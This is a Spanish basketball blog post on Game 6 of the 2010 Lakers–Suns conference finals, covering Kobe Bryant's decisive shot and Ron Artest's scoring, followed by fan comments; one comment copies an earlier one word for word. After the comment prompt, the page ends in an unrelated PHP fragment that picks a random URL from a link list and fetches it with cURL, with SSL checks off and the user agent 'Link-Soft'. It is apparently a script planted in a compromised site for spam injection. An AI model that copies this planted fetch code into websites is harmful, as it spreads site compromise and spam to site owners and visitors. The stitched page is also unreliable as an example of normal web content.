Playoffs 29/05/2010: La mentira de la estadística

30 de May de 2010 por txusma

Posiblemente la canasta que anotó Kobe Bryant ayer a falta de 34 segundos para el final no aparezca en las estadísticas de Buzzer Beaters. Una prueba más de que los números no lo son todo. Los fríos números nunca nos dirán que los Suns se habían puesto a 5 puntos tras recuperar a los Lakers una ventaja que había llegado a ser de 18 puntos a finales del tercer cuarto. Tampoco nos dirán que se trataba del 6º partido de una final de conferencia en casa de los Suns, con más de 18.000 almas gritando a la oreja del 24. Ni tampoco contarán que Kobe estaba pisando la línea de 3 puntos, con Grant Hill completamente encima, con su mano a escasos centímetros de la pelota en el momento de iniciar el vuelo. A Kobe no le contarán este buzzer beater pero nos da igual. Una vez más demostró que es el mejor cuando la pelota más quema. “Tu dale la pelota a quien quieras que yo se la daré a Kobe” decía un compañero discutiendo sobre los mejores jugadores en los momentos calientes. Ya no me atrevo a replicarle nada.

Y es que esa canasta fue la cerecita que coronaba una gran actuación de escolta angelino. 37 puntos, con canastas de todos los colores, algunas tan imposibles como la última que consiguió. Anoche su escudero no fue Pau Gasol, muy desacertado, sinó Ron Artest del que podremos decir en caso de que los Lakers se lleven un anillo que habrá sido clave en varios partidos de estos playoffs. Los Suns le flotaron descaradamente. Le obligaron a tirar y Artest lo hizo, y las metió. 4 de 7 en triple, 25 puntos y 3 robos. ¿Todavía echáis de menos a Trevor Ariza?

La conclusión es que después de cientos de partidos, Boston Celtics y Los Angeles Lakers disputarán la final. Los 2 últimos campeones, ni más ni menos. Los 2 equipos que se encontraron en la pista hace dos años. Pierce, Kobe, Gasol, Allen, Odom, Garnett, Artest, Rondo, Bynum, Wallace, Fisher… Espectáculo en estado puro. Ánimos de venganza para ambos. Unos para limpiar esa derrota que aún escuece, los otros para demostrar al mundo que nunca estuvieron acabados, que nunca se arrastraron.

Que empiece ya…

PREMIOS

MVP: 37 puntos en el 6º partido de las finales de conferencia. Cuando los grandes han de aparecer, Kobe Bryant nunca falla.

Sorpresa: Invitado por los Suns, Ron Artest se convirtió en el  factor X de la victoria angelina. Y hace poco muchos le estaban criticando.

Decepción: 118 partidos de Playoffs y ninguno en una final de la NBA. La historia le deberá algo a Steve Nash…

Esfuerzo en vano: Los Suns no han regalado nada y le han puesto las cosas difíciles a los actuales campeones. Un aplausos para todos ellos, desde Gentry hasta Louis Admunson.

Comenta

14 comentarios a esta entrada

  1. Jabho dice:
    #1

    Yo estos PO iba con Nash por encima de Boston incluso… uno más de los grandes que no ganaran el anillo…

    Hay que ir calentando así que… Beat L.A. !!!!!!

      Citar

  2. TheDeerHunter dice:
    #2

    Yo no diría tanto… pero desde luego no me hubiera dolido que Nash fuera campeón por fin.
    Ya podéis gritar, verdes… este año somos los favoritos y creo que lo vamos a demostrar.
    GO LAKERS GO!!!

    El factor Artest lo vamos a ver precisamente ahora contra un jugador como Pierce. Y para esto se le fichó. Creo que el céltico lo va a pasar jodidamente mal.

      Citar

  3. mmmm dice:
    #3

    In Rondo We Trust…

      Citar

  4. NBA LAKERS BLOG dice:
    #4

    Que bueno que todavía haya gente que no se deja llevar por la nueva era de las estadísticas que es lo que TANTO quiere vendernos la liga. Bien dicho también por eso.

    Por lo de Nash, una pequeña cosa: “La historia le deberá algo”… y los dos MVP?

    Te espero en nuestro blog de los Lakers 😉

    Un fuerte abrazo!

    -NM-

      Citar

  5. Viva_Dirk dice:
    #5

    El tema de Ariza lo hablaremos cuando acaben las finales, hasta entonces no hay discusión posible.

    Lo de Kobe ayer fue escandaloso del todo, a Gentry no le quedó otra solución que reirse.

      Citar

  6. educaja dice:
    #6

    Peaso post hermano, la carne de gallina.
    Vi el partido en directo y fue la leche, kobe, nash, artet, dragic, uff! de lo mejor en años.
    Buenas finales, si señor

      Citar

  7. Vader dice:
    #7

    Pierce lo pasará muy mal delante de Artest… pero creo que peor lo pasará Fisher delante de Rondo o el Robinson de ayer. Se presenta una final apasionante. Creo que la ganará el equipo que mejor le responda su segunda unidad.

    Saludos

      Citar

  8. TheDeerHunter dice:
    #8

    Ya no se ni cuantas veces hemos dicho ya eso de Fisher. En sus redes están, de momento, Westbrook, Deron Williams y Steve Nash.
    El pescador lleva unos playoffs más que impecables.

    En cualquier caso, es cierto, si hay algún duelo individual directo en el que los Celtics podrían ser superiores sin duda es ese. Veremos que rendimiento le sacan al asunto.

      Citar

  9. Vader dice:
    #9

    Ya no es sólo cuestión de Fisher. Desde siempre los equipos entrenados por Phil Jackson lo pasan muy mal ante bases pequeños y muy rápidos. Con los Bulls pasaba lo mismo, ha Jackson le gustan bases altos y tiradores y casi siempre estos son más lentos que los rivales.

    Sobre estos playoff y los rivales que ha tenido Fisher decir que Deron Williams es muy físico pero no es tan rápido como otros… y contra Westbrook en algunos partidos lo tuvo que defender Kobe para con Fisher hacia lo que queria…

    Saludos

      Citar

  10. Love Denise dice:
    #10

    Hablando de bases en L.A. Que creeis que es lo mejor para el año que viene? Seguir apostando por la dupla Fisher-Farmar, o intentar traspasar a alguien a cambio de un buen base (por poner un ejemplo, un Harris-Odom)?, O L.A. tiene margen para fichar a algun agente libre, quizás Felton??

      Citar

  11. Chris dice:
    #11

    Grande Kobe y grandes Lakers.
    @Love Denise: Yo trataria de ir a por Delonte West o en su defecto Daniel Gibson.
    El base perfecto para tito Phil es HInrich pero eso será dificil.

      Citar

  12. mmmm dice:
    #12

    Chris, con esos dos estás en las mismas, esos 2 no es que repartan mucho juego que digamos… Los lakers necesitan a un tío poco anotador que tenga una buena mano para las asistencias.

      Citar

  13. Love Denise dice:
    #13

    el base perfecto para Phil, Hinrich?? Pues que mal gusto tiene Jackson, en mi opinión, no es mal jugador, pero para lo que cobra (9 kilos) es una castaña, a no ser que lo trajeran por Vujacic y Walton y se quitaran de en medio a esos 2 paquetes. Entonces si sería un negocio redondo, pero no creo que los Bulls estén dispuesto a ello.

      Citar

  14. Emily dice:
    #14

    Pierce lo pasará muy mal delante de Artest… pero creo que peor lo pasará Fisher delante de Rondo o el Robinson de ayer. Se presenta una final apasionante. Creo que la ganará el equipo que mejor le responda su segunda unidad.

    Saludos

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>